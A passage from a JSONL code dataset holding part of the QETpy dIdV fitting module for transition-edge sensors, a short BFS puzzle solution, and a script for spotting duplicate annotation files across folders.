resistance in the circuit, Ohms\n r0 : float, optional\n The estimated resistance of the TES in Ohms. Should be set if\n accurate small signal parameters are desired.\n rp : float, optional\n The estimated parasitic resistance of the non-shunt side of the\n TES circuit in Ohms. Should be set if accurate small signal\n parameters are desired.\n dutycycle : float, optional\n The duty cycle of the signal generator, should be a float\n between 0 and 1. Set to 0.5 by default\n add180phase : boolean, optional\n If the signal generator is out of phase (i.e. if it looks like\n --__ instead of __--), then this should be set to True. Adds\n half a period of the signal generator to the dt0 attribute.\n dt0 : float, optional\n The value of the starting guess for the time offset of the didv\n when fitting. The best way to use this value if it isn't\n converging well is to run the fit multiple times, setting `dt0`\n equal to the fit's next value, and seeing where the `dt0` value\n converges. The fit can have a difficult time finding the value\n on the first run if it the initial value is far from the actual\n value, so a solution is to do this iteratively.\n\n Returns\n -------\n didvobj : Object\n A DIDV class object that can be used to fit the dIdV and return\n the fit parameters.\n\n \"\"\"\n\n didvobj = DIDV(\n None,\n fs,\n sgfreq,\n sgamp,\n rsh,\n r0=r0,\n rp=rp,\n add180phase=add180phase,\n dt0=dt0,\n dutycycle=dutycycle,\n )\n\n didvobj._didvmean = didvmean\n didvobj._didvstd = didvstd\n didvobj._offset = offset\n didvobj._offset_err = offset_err\n didvobj._tmean = tmean\n didvobj._dt0 = dt0\n\n if didvobj._add180phase:\n didvobj._dt0 = didvobj._dt0 + 1 / (2 * didvobj._sgfreq)\n\n didvobj._time = np.arange(len(tmean)) / fs - didvobj._dt0\n didvobj._freq = np.fft.fftfreq(len(tmean), d=1.0 / fs)\n\n nbins = len(didvobj._tmean)\n nperiods = np.floor(nbins*didvobj._sgfreq/didvobj._fs)\n\n flatindstemp = list()\n for i in range(0, int(nperiods)):\n # get index ranges for flat parts of trace\n flatindlow = int(\n (float(i) + 0.25) * didvobj._fs / didvobj._sgfreq\n ) + int(didvobj._dt0 * didvobj._fs)\n flatindhigh = int(\n (float(i) + 0.48) * didvobj._fs / didvobj._sgfreq\n ) + int(didvobj._dt0 * didvobj._fs)\n flatindstemp.append(range(flatindlow, flatindhigh))\n flatinds = np.array(flatindstemp).flatten()\n\n didvobj._flatinds = flatinds[np.logical_and(\n flatinds > 0, flatinds < nbins,\n )]\n\n return didvobj\n\n\nclass DIDV(_BaseDIDV, _PlotDIDV):\n \"\"\"\n Class for fitting a didv curve for different types of models of the\n didv. Also gives various other useful values pertaining to the\n didv. This class supports doing 1, 2, and 3 pole fits. This is\n supported in a way that does one dataset at a time.\n\n \"\"\"\n\n def __init__(self, rawtraces, fs, sgfreq, sgamp, rsh, tracegain=1.0,\n r0=0.3, rp=0.005, dutycycle=0.5, add180phase=False,\n dt0=1.5e-6, autoresample=False):\n \"\"\"\n Initialization of the DIDV class object\n\n Parameters\n ----------\n rawtraces : ndarray\n The array of rawtraces to use when fitting the didv. Should\n be of shape (number of traces, length of trace in bins).\n This can be any units, as long as tracegain will convert\n this to Amps.\n fs : float\n Sample rate of the data taken, in Hz\n sgfreq : float\n Frequency of the signal generator, in Hz\n sgamp : float\n Peak-to-peak size of the square wave supplied by the signal\n generator, in Amps (equivalent to jitter in the QET bias)\n rsh : float\n Shunt resistance in the circuit, Ohms\n tracegain : float, optional\n The factor that the rawtraces should be divided by to\n convert the units to Amps. If rawtraces already has units\n of Amps, then this should be set to 1.0\n r0 : float, optional\n The estimated resistance of the TES in Ohms. Should be set\n if accurate small signal parameters are desired.\n rp : float, optional\n The estimated parasitic resistance of the non-shunt side of\n the TES circuit in Ohms. Should be set if accurate small\n signal parameters are desired.\n dutycycle : float, optional\n The duty cycle of the signal generator, should be a float\n between 0 and 1. Set to 0.5 by default\n add180phase : boolean, optional\n If the signal generator is out of phase (i.e. if it looks\n like --__ instead of __--), then this should be set to\n True. Adds half a period of the signal generator to the\n `dt0` attribute\n dt0 : float, optional\n The value of the starting guess for the time offset of the\n didv when fitting. The best way to use this value if it\n isn't converging well is to run the fit multiple times,\n setting dt0 equal to the fit's next value, and seeing where\n the dt0 value converges. The fit can have a difficult time\n finding the value on the first run if it the initial value\n is far from the actual value, so a solution is to do this\n iteratively.\n autoresample : bool, optional\n If True, the initialization will automatically resample\n the data so that `fs` / `sgfreq` is an integer, which\n ensures that an arbitrary number of signal-generator\n periods can fit in an integer number of time bins. See\n `qetpy.utils.resample_data` for more info.\n\n \"\"\"\n\n super().__init__(\n rawtraces,\n fs,\n sgfreq,\n sgamp,\n rsh,\n tracegain=tracegain,\n r0=r0,\n rp=rp,\n dutycycle=dutycycle,\n add180phase=add180phase,\n dt0=dt0,\n autoresample=autoresample,\n )\n\n\n @staticmethod\n def _fitdidv(freq, didv, yerr=None, A0=0.25, B0=-0.6, C0=-0.6,\n tau10=-1.0/(2*np.pi*5e2), tau20=1.0/(2*np.pi*1e5), tau30=0.0,\n dt=-10.0e-6, poles=2, isloopgainsub1=None,\n bounds=None, lgcfix=None, verbose=0, max_nfev=1000,\n method='trf', loss='linear',\n ftol=1e-15, xtol=1e-15):\n \"\"\"\n Function to find the fit parameters for either the 1-pole\n (A, tau2, dt), 2-pole (A, B, tau1, tau2, dt), or 3-pole\n (A, B, C, tau1, tau2, tau3, dt) fit.\n\n \"\"\"\n\n if (poles==1):\n # assume the square wave is not inverted\n p0 = np.array((A0, tau20, dt), dtype=float)\n bounds1=bounds\n if bounds is None:\n bounds1 = (\n np.array((0.0, 0.0, -np.inf)),\n np.array((np.inf, np.inf, np.inf)),\n )\n # assume the square wave is inverted\n p02 = np.array((-A0, tau20, dt), dtype=float)\n bounds2=bounds\n if bounds is None:\n bounds2 = (\n np.array((-np.inf, 0.0, -np.inf)),\n np.array((0.0, np.inf, np.inf)),\n )\n elif (poles==2):\n # assume loop gain > 1, where B<0 and tauI<0\n p0 = np.array((A0, B0, tau10, tau20, dt),\n dtype=float)\n bounds1 = bounds\n if bounds is None:\n bounds1 = (\n np.array((0.0, -np.inf, -np.inf, 0.0, -np.inf)),\n np.array((np.inf, 0.0, 0.0, np.inf, np.inf)),\n )\n \n # assume loop gain < 1, where B>0 and tauI>0\n p02 = np.array((A0, -B0, -tau10, tau20, dt),\n dtype=float)\n bounds2 = bounds\n if bounds is None:\n bounds2 = (\n np.array((0.0, 0.0, 0.0, 0.0, -np.inf)),\n np.array((np.inf, np.inf, np.inf, np.inf, np.inf)),\n )\n \n \n elif (poles==3):\n # assume loop gain > 1, where B<0 and tauI<0\n p0 = np.array((A0, B0, C0, tau10, tau20, tau30, dt),\n dtype=float)\n bounds1 = bounds\n if bounds is None:\n bounds1 = (\n np.array((0.0, -np.inf, -np.inf, -np.inf, 0.0, 0.0, -np.inf)),\n np.array((np.inf, 0.0, 0.0, 0.0, np.inf, np.inf, np.inf)),\n )\n # assume loop gain < 1, where B>0 and tauI>0\n p02 = np.array((A0, -B0, -C0, -tau10, tau20, tau30, dt),\n dtype=float)\n bounds2 = bounds\n if bounds is None:\n bounds2 = (\n np.array((0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -np.inf)),\n np.array((np.inf, np.inf, np.inf, np.inf, np.inf, np.inf, np.inf)),\n )\n\n\n fix_params = None\n if lgcfix is not None:\n\n fix_params = p0[lgcfix].copy()\n \n p0 = p0[~lgcfix]\n bounds1 = (bounds1[0][~lgcfix],\n bounds1[1][~lgcfix])\n \n p02 = p02[~lgcfix]\n bounds2 = (bounds2[0][~lgcfix],\n bounds2[1][~lgcfix])\n\n \n\n \n def _residual_calc(params):\n \"\"\"\n Define a residual for the nonlinear least squares\n algorithm. Different functions for different amounts of\n poles.\n\n \"\"\"\n if (poles==1):\n A, tau2, dt = params\n ci = DIDV._onepoleadmittance(\n freq, A, tau2,\n ) * np.exp(-2.0j*np.pi*freq*dt)\n\n elif(poles==2):\n A, B, tau1, tau2, dt = params\n ci = DIDV._twopoleadmittance(\n freq, A, B, tau1, tau2,\n ) * np.exp(-2.0j*np.pi*freq*dt)\n \n elif(poles==3):\n A, B, C, tau1, tau2, tau3, dt = params\n ci = DIDV._threepoleadmittance(\n freq, A, B, C, tau1, tau2, tau3,\n ) * np.exp(-2.0j*np.pi*freq*dt)\n\n # the difference between the data and the fit\n diff = didv - ci\n # get the weights from yerr, these should be\n # 1/(standard deviation) for real and imaginary parts\n if (yerr is None):\n weights = 1.0+1.0j\n else:\n weights = 1.0/yerr.real+1.0j/yerr.imag\n # create the residual vector, splitting up real and imaginary\n # parts of the residual separately\n z1d = np.zeros(freq.size*2, dtype=np.float64)\n z1d[0:z1d.size:2] = diff.real*weights.real\n z1d[1:z1d.size:2] = diff.imag*weights.imag\n return z1d\n\n\n def _residual(var_params):\n \"\"\"\n Function that is passed to nonlinear \n least_squares scipy algorithm\n \n Parameters\n ----------\n\n var_params : np.array (dtype=float)\n variable fit parameters array\n\n \n Return\n ------\n\n residual : np.array\n \"\"\"\n\n if fix_params is None:\n return _residual_calc(var_params)\n else:\n all_params = np.zeros_like(lgcfix, dtype=float)\n np.place(all_params, lgcfix, fix_params)\n np.place(all_params, ~lgcfix, var_params)\n return _residual_calc(all_params)\n\n \n\n if (isloopgainsub1 is None):\n # res1 assumes loop gain > 1, where B<0 and tauI<0\n res1 = least_squares(\n _residual,\n p0,\n bounds=bounds1,\n loss=loss,\n max_nfev=max_nfev,\n x_scale=np.abs(p0),\n verbose=verbose,\n method=method,\n ftol=ftol,\n xtol=xtol,\n )\n # res2 assumes loop gain < 1, where B>0 and tauI>0\n res2 = least_squares(\n _residual,\n p02,\n bounds=bounds2,\n loss=loss,\n max_nfev=max_nfev,\n x_scale=np.abs(p0),\n verbose=verbose,\n method=method,\n ftol=ftol,\n xtol=xtol,\n )\n # check which loop gain cases gave the better fit\n if (res1['cost'] < res2['cost']):\n res = res1\n else:\n res = res2\n elif isloopgainsub1:\n # assume loop gain < 1, where B>0 and tauI>0\n res = least_squares(\n _residual,\n p02,\n bounds=bounds2,\n loss=loss,\n max_nfev=max_nfev,\n x_scale=np.abs(p0),\n verbose=verbose,\n method=method,\n ftol=ftol,\n xtol=xtol,\n )\n else:\n #assume loop gain > 1, where B<0 and tauI<0\n res = least_squares(\n _residual,\n p0,\n bounds=bounds1,\n loss=loss,\n max_nfev=max_nfev,\n x_scale=np.abs(p0),\n verbose=verbose,\n method=method,\n ftol=ftol,\n xtol=xtol,\n )\n\n\n # variables\n popt = res['x'].copy()\n if lgcfix is not None:\n popt = np.zeros_like(lgcfix, dtype=float)\n np.place(popt, lgcfix, fix_params)\n np.place(popt, ~lgcfix, res['x'])\n \n # cost\n cost = res['cost']\n\n\n # check if the fit failed (usually only happens when we reach maximum\n # evaluations, likely when fitting assuming the wrong loop gain)\n if not res['success'] :\n print(f\"{poles}-Pole Fit Failed: \" + res['message'])\n\n # take matrix product of transpose of jac and jac, take the inverse\n # to get the analytic covariance matrix\n pcovinv = np.dot(res[\"jac\"].transpose(), res[\"jac\"])\n pcov = np.linalg.pinv(pcovinv)\n\n return popt, pcov, cost\n\n\n def dofit(self, poles, fcutoff=np.inf,\n bounds=None, guess_params=None,\n guess_isloopgainsub1=None,\n biasparams_dict=None,\n lgcfix=None, lgc_ssp_light=False,\n verbose=0, max_nfev=1000,\n method='trf', loss='linear',\n ftol=1e-15, xtol=1e-15):\n \"\"\"\n This method does the fit that is specified by the variable\n poles. If the `processtraces` method has not been run yet, then\n this method will run that first.\n\n Parameters\n ----------\n poles : int\n The fit that should be run. Should be 1, 2, or 3.\n fcutoff : float, optional\n The cutoff frequency in Hz, above which data is ignored in\n the specified fitting routine. Default is `np.inf`, which\n is equivalent to no cutoff frequency.\n bounds: \n lgc_ssp_light : bool, optional\n Used to tell dofit that the smallsignalparams light (only\n beta, l, L, tau0, gratio) result dictionary including\n uncertainties and covaraiance matrix should be calculted\n\n Raises\n ------\n ValueError\n If the inputted `poles` is not 1, 2, or 3.\n\n Notes\n -----\n Depending on the fit, there are three possible models to be\n used with different parameterizations:\n\n 1-pole model\n - has the form:\n dV/dI = A * (1.0 + 2.0j * pi * freq * tau2)\n\n 2-pole model\n - has the form:\n dV/dI = A * (1.0 + 2.0j * pi * freq * tau2)\n + B / (1.0 + 2.0j * pi * freq * tau1)\n\n 3-pole model\n - note the placement of the parentheses in the last term of\n this model, such that pole related to `C` is in the\n denominator of the `B` term\n - has the form: \n dV/dI = A * (1.0 + 2.0j * pi * freq * tau2)\n + B / (1.0 + 2.0j * pi * freq * tau1\n - C / (1.0 + 2.0j * pi * freq * tau3))\n\n \"\"\"\n\n if self._tmean is None:\n self.processtraces()\n\n fit_freqs = np.abs(self._freq) < fcutoff\n\n\n \n # 1-Pole fit\n if poles==1:\n \n # guess the 1 pole square wave parameters\n A0_1pole, tau20_1pole = DIDV._squarewaveguessparams(\n self._tmean,\n self._sgamp,\n self._rsh,\n )\n \n # time shift guess\n dt = self._dt0\n \n # overrite guessed values if provided by user\n if guess_params is not None:\n if len(guess_params) != 3:\n raise ValueError(\n 'Expecting 2 guessed parameters. '\n + 'Found ' + str(len(guess_params)))\n inA0, intau20, indt = guess_params\n if inA0 is not None:\n A0_1pole = inA0\n if intau20 is not None:\n tau20_1pole = intau20\n if indt is not None:\n dt = indt\n\n \n # 1 pole fitting\n fitparams1, fitcov1, fitcost1 = DIDV._fitdidv(\n self._freq[fit_freqs],\n self._didvmean[fit_freqs],\n yerr=self._didvstd[fit_freqs],\n A0=A0_1pole,\n tau20=tau20_1pole,\n dt=dt,\n poles=poles,\n isloopgainsub1=False,\n bounds=bounds,\n lgcfix=lgcfix,\n verbose=verbose,\n max_nfev=max_nfev,\n method=method,\n loss=loss,\n ftol=ftol,\n xtol=xtol,\n )\n\n # Convert to didv falltimes\n falltimes1 = DIDV._findpolefalltimes(fitparams1)\n\n self._1poleresult = DIDV._fitresult(\n poles,\n fitparams1,\n fitcov1,\n falltimes1,\n fitcost1,\n self._rsh,\n self._rp,\n self._r0,\n self._offset,\n self._offset_err, \n lgcfix=lgcfix,\n biasparams_dict=biasparams_dict,\n )\n\n elif poles==2:\n \n \n # Guess the starting parameters for 2 pole fitting\n A0, B0, tau10, tau20, isloopgainsub1 = DIDV._guessdidvparams(\n self._tmean,\n self._tmean[self._flatinds],\n self._sgamp,\n self._rsh,\n L0=1.0e-7,\n )\n\n # time shift\n dt0 = self._dt0\n \n\n # overrite guessed values if provided by user\n if guess_params is not None:\n if len(guess_params) != 5:\n raise ValueError(\n 'Expecting 5 guessed parameters. '\n + 'Found ' + str(len(guess_params)))\n inA0, inB0, intau10, intau20, indt = guess_params\n if inA0 is not None:\n A0 = inA0\n if inB0 is not None:\n B0 = inB0\n if intau10 is not None:\n tau10 = intau10\n if intau20 is not None:\n tau20 = intau20\n if indt is not None:\n dt0 = indt\n\n\n # loopgainsub1 \n if guess_isloopgainsub1 is not None:\n isloopgainsub1 = guess_isloopgainsub1\n \n \n\n # 2 pole fitting\n fitparams2, fitcov2, fitcost2 = DIDV._fitdidv(\n self._freq[fit_freqs],\n self._didvmean[fit_freqs],\n yerr=self._didvstd[fit_freqs],\n A0=A0,\n B0=B0,\n tau10=tau10,\n tau20=tau20,\n dt=dt0,\n poles=poles,\n isloopgainsub1=isloopgainsub1,\n bounds=bounds,\n lgcfix=lgcfix,\n verbose=verbose,\n max_nfev=max_nfev,\n method=method,\n loss=loss,\n ftol=ftol,\n xtol=xtol,\n )\n\n \n # Convert to didv falltimes\n falltimes2 = DIDV._findpolefalltimes(fitparams2)\n\n self._2poleresult = DIDV._fitresult(\n poles,\n fitparams2,\n fitcov2,\n falltimes2,\n fitcost2,\n self._rsh,\n self._rp,\n self._r0,\n self._offset, \n self._offset_err, \n lgcfix=lgcfix,\n biasparams_dict=biasparams_dict,\n )\n\n elif poles==3:\n \n if self._2poleresult is None:\n # Guess the 3-pole fit starting parameters from\n # 2-pole fit guess\n A0, B0, tau10, tau20 = DIDV._guessdidvparams(\n self._tmean,\n self._tmean[self._flatinds],\n self._sgamp,\n self._rsh,\n L0=1.0e-7,\n )[:-1]\n B0 = -abs(B0)\n C0 = -0.05\n tau10 = -abs(tau10)\n tau30 = 1.0e-3\n dt0 = self._dt0\n \n else:\n A0 = self._2poleresult['params']['A']\n B0 = -abs(self._2poleresult['params']['B'])\n C0 = -0.05\n tau10 = -abs(self._2poleresult['params']['tau1']) \n tau20 = self._2poleresult['params']['tau2']\n tau30 = 1.0e-3\n dt0 = self._2poleresult['params']['dt']\n\n\n # is loop gain < 1\n isloopgainsub1 = DIDV._guessdidvparams(\n self._tmean,\n self._tmean[self._flatinds],\n self._sgamp,\n self._rsh,\n L0=1.0e-7,\n )[-1]\n\n \n # overwrite guessed values if provided by user\n if guess_params is not None:\n if len(guess_params) != 7:\n raise ValueError(\n 'Expecting 7 guessed parameters. '\n + 'Found ' + str(len(guess_params)))\n inA0, inB0, inC0, intau10, intau20, intau30, indt = guess_params\n if inA0 is not None:\n A0 = inA0\n if inB0 is not None:\n B0 = inB0\n if inC0 is not None:\n C0 = inC0\n if intau10 is not None:\n tau10 = intau10\n if intau20 is not None:\n tau20 = intau20\n if intau30 is not None:\n tau30 = intau30 \n if indt is not None:\n dt0 = indt\n\n\n # loopgainsub1 \n if guess_isloopgainsub1 is not None:\n isloopgainsub1 = guess_isloopgainsub1\n\n\n \n # 3 pole fitting\n fitparams3, fitcov3, fitcost3 = DIDV._fitdidv(\n self._freq[fit_freqs],\n self._didvmean[fit_freqs],\n yerr=self._didvstd[fit_freqs],\n A0=A0,\n B0=B0,\n C0=C0,\n tau10=tau10,\n tau20=tau20,\n tau30=tau30,\n dt=dt0,\n poles=poles,\n isloopgainsub1=isloopgainsub1,\n bounds=bounds,\n lgcfix=lgcfix,\n verbose=verbose,\n max_nfev=max_nfev,\n method=method,\n loss=loss,\n ftol=ftol,\n xtol=xtol,\n )\n\n # Convert to didv falltimes\n falltimes3 = DIDV._findpolefalltimes(fitparams3)\n\n self._3poleresult = DIDV._fitresult(\n poles,\n fitparams3,\n fitcov3,\n falltimes3,\n fitcost3,\n self._rsh,\n self._rp,\n self._r0,\n self._offset,\n self._offset_err,\n lgcfix=lgcfix,\n biasparams_dict=biasparams_dict,\n )\n \n if lgc_ssp_light:\n ssp_light_cov = get_smallsignalparams_cov(self._3poleresult)\n ssp_light_sigmas = get_smallsignalparams_sigmas(self._3poleresult)\n \n self._3poleresult = DIDV._fitresult(\n poles,\n fitparams3,\n fitcov3,\n falltimes3,\n fitcost3,\n self._rsh,\n self._rp,\n self._r0,\n self._offset,\n self._offset_err,\n lgcfix=lgcfix,\n biasparams_dict=biasparams_dict,\n ssp_light_cov=ssp_light_cov,\n ssp_light_sigmas=ssp_light_sigmas,\n )\n \n\n else:\n raise ValueError(\"The number of poles should be 1, 2, or 3.\")\n\n def dofit_with_true_current(self, offset_dict, output_offset, closed_loop_norm, output_gain,\n ibias_metadata,\n bounds=None, guess=None,\n inf_loop_gain_approx=False, inf_loop_gain_limit=False, \n lgcdiagnostics=False):\n \"\"\"\n Given the offset dictionary used to store the various current\n current offsets used to reconstruct the true current through the \n TES and the trace metadata, finds the true current through the TES,\n makes a biasparams dict, and recalculates the smallsignalparams\n from the newly found true bias point.\n \n \n Parameters:\n ----------\n \n offset_dict: dict\n Where are the relevant offsets are stored. Generated from the IV\n sweep.\n \n output_offset: float, volts\n The output offset gotten from the event metadata. In units of volts,\n we correct for volts to amps conversion with the closed loop norm.\n \n closed_loop_norm: float, volts/amp=ohms\n The constant from the metadata used to translate the voltage measured by\n the DAQ into a current coming into the input coil of the SQUIDs. In units of\n volts/amp = ohms.\n \n output_gain: float, dimensionless\n The dimensionless gain used to convert the output offset in volts to the \n equivilant offset voltage measured by the DAQ\n \n ibias_metadata: float\n The ibias gotten from the event metadata, i.e. without correcting for\n the ibias offset calculated from the IV curve\n \n bounds: array, optional\n Passed to dofit.\n \n guess: array, optional\n Passed to dofit\n \n inf_loop_gain_approx : bool, optional\n Defaults to False. If True, calculates the biasparameters and the\n rest of the fits using the infinite loop gain approximation.\n \n inf_loop_gain_limit : bool, optional\n Defaults to False. If True, calculates the biasparameters and the\n rest of the fits using the infinite loop gain approximation only if\n the fit loopgain is negative.\n \n Returns:\n --------\n \n result3: fitresult_dict\n 3 pole fit result with biasparams calculated, and the smallsignalparams\n correctly calculated from the r0 calculated for the biasparams\n \n \"\"\"\n\n self._rp = offset_dict['rp']\n\n rsh = self._rsh\n rp = self._rp\n\n offset = self._offset\n offset_err = self._offset_err\n\n i0, i0_err = get_i0(offset, offset_err, offset_dict, output_offset,\n closed_loop_norm, output_gain, lgcdiagnostics)\n ibias, ibias_err = get_ibias(ibias_metadata, offset_dict, lgcdiagnostics)\n biasparams_dict = get_tes_bias_parameters_dict(i0, i0_err, ibias, ibias_err, rsh, rp)\n \n if inf_loop_gain_approx:\n biasparams_dict = get_tes_bias_parameters_dict_infinite_loop_gain(self._3poleresult['params'], self._3poleresult['cov'], i0, i0_err, ibias, ibias_err, rsh, rp)\n \n self._r0 = biasparams_dict['r0']\n\n result3 = self.dofit(3, bounds=bounds, guess_params=guess, biasparams_dict=biasparams_dict,\n lgc_ssp_light = True)\n \n if inf_loop_gain_limit:\n if self._3poleresult['smallsignalparams']['l'] < 0:\n biasparams_dict = get_tes_bias_parameters_dict_infinite_loop_gain(self._3poleresult['params'], \n self._3poleresult['cov'], i0, \n i0_err, ibias, ibias_err, \n rsh, rp)\n result3 = self.dofit(3, bounds=bounds, guess_params=guess, biasparams_dict=biasparams_dict,\n lgc_ssp_light = True)\n \n return result3\n\n @staticmethod\n def _fitresult(poles, params, cov, falltimes, cost, rsh, rp, r0,\n offset, offset_err, \n biasparams_dict=None, lgcfix=None,\n ssp_light_cov=None, ssp_light_sigmas=None):\n \"\"\"\n Function for converting data from different fit results to a\n results dictionary.\n\n \"\"\"\n\n result = dict()\n result['lgcfix'] = lgcfix\n\n # errors\n errors = np.diag(cov)**0.5\n if lgcfix is not None:\n errors = np.zeros_like(lgcfix, dtype=float)\n np.place(errors, lgcfix, 0.0)\n np.place(errors, ~lgcfix, np.diag(cov)**0.5)\n \n if poles == 1:\n result['params'] = {\n 'A': params[0],\n 'tau2': params[1],\n 'dt': params[2],\n }\n result['cov'] = cov\n result['errors'] = {\n 'A': errors[0],\n 'tau2': errors[1],\n 'dt': errors[2],\n }\n\n smallsignalparams = DIDV._converttotesvalues(params, rsh, r0, rp)\n\n result['smallsignalparams'] = {\n 'rsh': smallsignalparams[0],\n 'rp': smallsignalparams[1],\n 'L': smallsignalparams[2],\n 'dt': smallsignalparams[3],\n }\n\n if poles == 2:\n result['params'] = {\n 'A': params[0],\n 'B': params[1],\n 'tau1': params[2],\n 'tau2': params[3],\n 'dt': params[4],\n }\n result['cov'] = cov\n result['errors'] = {\n 'A': errors[0],\n 'B': errors[1],\n 'tau1': errors[2],\n 'tau2': errors[3],\n 'dt': errors[4],\n }\n\n smallsignalparams = DIDV._converttotesvalues(params, rsh, r0, rp)\n\n result['smallsignalparams'] = {\n 'rsh': smallsignalparams[0],\n 'rp': smallsignalparams[1],\n 'r0': smallsignalparams[2],\n 'beta': smallsignalparams[3],\n 'l': smallsignalparams[4],\n 'L': smallsignalparams[5],\n 'tau0': smallsignalparams[6],\n 'dt': smallsignalparams[7],\n }\n\n if poles == 3:\n result['params'] = {\n 'A': params[0],\n 'B': params[1],\n 'C': params[2],\n 'tau1': params[3],\n 'tau2': params[4],\n 'tau3': params[5],\n 'dt': params[6],\n }\n result['cov'] = cov\n result['errors'] = {\n 'A': errors[0],\n 'B': errors[1],\n 'C': errors[2],\n 'tau1': errors[3],\n 'tau2': errors[4],\n 'tau3': errors[5],\n 'dt': errors[6],\n }\n\n smallsignalparams = DIDV._converttotesvalues(params, rsh, r0, rp)\n\n result['smallsignalparams'] = {\n 'rsh': smallsignalparams[0],\n 'rp': smallsignalparams[1],\n 'r0': smallsignalparams[2],\n 'beta': smallsignalparams[3],\n 'l': smallsignalparams[4],\n 'L': smallsignalparams[5],\n 'tau0': smallsignalparams[6],\n 'gratio': smallsignalparams[7],\n 'tau3': smallsignalparams[8],\n 'dt': smallsignalparams[9],\n }\n \n #we only calculate the smallsignalparameters covaraiance matrix for\n #these parameters, so this is just a container for them\n if (ssp_light_cov is not None) and (ssp_light_sigmas is not None):\n ssp_light_vals = {\n 'beta': smallsignalparams[3],\n 'l': smallsignalparams[4],\n 'L': smallsignalparams[5],\n 'tau0': smallsignalparams[6],\n 'gratio': smallsignalparams[7],\n }\n result['ssp_light'] = {\n 'vals': ssp_light_vals,\n 'cov': ssp_light_cov,\n 'sigmas': ssp_light_sigmas,\n }\n\n result['offset'] = offset\n result['offset_err'] = offset_err\n \n if biasparams_dict is not None:\n result['biasparams'] = biasparams_dict\n \n result['falltimes'] = falltimes\n result['cost'] = cost\n result['didv0'] = complexadmittance(0, **result['smallsignalparams']).real\n\n return result\n","repo_name":"spice-herald/QETpy","sub_path":"qetpy/core/didv/_didv.py","file_name":"_didv.py","file_ext":"py","file_size_in_byte":36481,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"54"} +{"seq_id":"16783164253","text":"from collections import deque\n\n\ndef bfs(a):\n q = deque()\n q.append([a, 1])\n visit[a] = 1\n while q:\n v = q.popleft()\n for i in [v[0]*2, v[0]*10 + 1]:\n if i < b+1:\n if i not in visit.keys():\n q.append([i, v[1]+1])\n visit[i] = 1\n if i == b:\n return v[1] + 1\n\n return -1\n\n\na, b = map(int, input().split())\nvisit = dict()\nprint(bfs(a))\n","repo_name":"yyytae0/algorithm-training","sub_path":"baekjoon/16953.py","file_name":"16953.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"25722426995","text":"check = '//192.168.133.14/shenzhen_rsycn/adas_parsing_data_1911_b/check'\nrepeat = 'C:/Users/Gigabyte/Desktop/adas_parsing_data_0409_to0410'\nfrom pathlib import Path\n\n# c=Path(check)\n# p=Path(repeat)\n# check_dirs = [i for i in c.iterdir() if i.is_dir]\n# repeat_dirs = [i for i in p.iterdir() if i.is_dir]\n\nimg_paths = [i for i in Path(repeat).rglob('*.jpg')]\njson_paths = [i for i in Path(repeat).rglob('*.json')]\n# images = c.rglob('*.jpg')\n# print(len(jpgs) + len(jsons))\nimport cv2\n\n# img_names = []\n# for img_path in img_paths:\n# img_name = img_path.name\n# img_names.append(img_name)\n# \n# for idx, img_name in enumerate(img_names):\n# # print(img_name)\n# if img_names.count(img_name) > 1:\n# print(img_paths[idx])\n \njson_names = []\nfor json_path in json_paths:\n json_name = json_path.name\n json_names.append(json_name)\n\nrepeat_json_names=set()\nfor idx, json_name in enumerate(json_names):\n # repeat_json_path_group_tmp = []\n if json_names.count(json_name) > 1:\n repeat_json_names.add(json_name)\n\n\n\n\nfor repeat_json_name in repeat_json_names:\n json_paths_this_name_in_check = [str(i) for i in Path(check).rglob(repeat_json_name)]\n print(json_paths_this_name_in_check)\n\n# # repeat_json_path_group_tmp = []\n# if json_names.count(json_name) > 1:\n# repeat_json_names.add(json_name)\n\n\n# import shutil\n#\n# for repeat_json_name in repeat_json_names:\n# repeat_json_paths_this_name = [i for i in Path(repeat).rglob(repeat_json_name)]\n# # print(repeat_json_paths_this_name)\n# with open(str(file-tools), 'r') as f:\n# dict = json.load(f)\n# image_name = dict['imagePath']\n# if '.jpg'in image_name:\n# shutil.copy(str(file-tools), new_path)\n# else:\n# continue\n\n# print(repeat_json_names)\n# img_paths = [i for i in Path(repeat).rglob('*.jpg')]\n# json_paths = [i for i in Path(repeat).rglob('*.json')]\n\n# img_names = []\n# for img_path in imgs:\n# img_name = img_path.name\n# img_names.append(img_name)\n#\n# for img_name in img_names:\n# # print(img_name)\n# if img_names.count(img_name) > 1:\n# print(img_name)\n\nimport os\n\n# for root, dirs, files in os.walk(repeat):\n# if os.path.isfile(fname)\n# # for rqcodeFile in files:\n# print(str(files))\n\n# print(check_dirs)\n# from pathlib import Path\n# import shutil\n# import cv2\n# # root = '192.168.133.14/ai_lab/gaoxiang/dataset/train_dataset/adas_parsing_data_0409_to0410/'\n# json_paths = []\n# image_paths = []\n#\n# file-tools = open(\"./repeat_log.txt\", 'r', encoding='utf-8')\n# for line in file-tools.readlines():\n#\n# # check_file_path = root + line\n# # check_file_path = str(check_file_path)\n# # check_file_path = repr(check_file_path)\n# # line = line.replace(\"\\\\\", \"/\")\n# # line = 'line\n# # check_file_path = str(check_file_path)\n# line = eval(line)\n# # check_file_path.strip('\\n')\n#\n# # print(line)\n#\n# if line[:-1] == 'g':\n# print(line)\n# # json_paths.append(check_file_path)\n# # suffix = check_file_path[-5:]\n# # if suffix == 'json':\n# # print(suffix)\n# # img = cv2.imread(check_file_path)\n# # cv2.imshow(\"s\", img)\n# # cv2.waitKey()\n# # image_paths.append(check_file_path)\n#\n# # print(check_file_path)\n#\n# # line=str(line)\n# # line = line.strip('adas_parsing_data_0409_to0410')\n# # print(line)\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n# # dst_path_images = 'C:\\\\Users\\\\Gigabyte\\\\Desktop\\\\images'\n# # dst_path_jsons = 'C:\\\\Users\\\\Gigabyte\\\\Desktop\\\\jsons'\n# # dst_path_repeats = 'C:\\\\Users\\\\Gigabyte\\\\Desktop\\\\repeats'\n# #\n# # src_dirs = [i for i in Path(src_path).iterdir() if i.is_dir]\n# # processed_file_names = []\n# #\n# #\n# # def process_files(processed_file_names, files):\n# # for file-tools in files:\n# # file_name = file-tools.name\n# # file_suffix = file-tools.suffix\n# # processed_file_names.append(file_name)\n# # if file_name in processed_file_names:\n# # shutil.copy(str(file-tools), dst_path_repeats)\n# # else:\n# # if file_suffix == '.json':\n# # 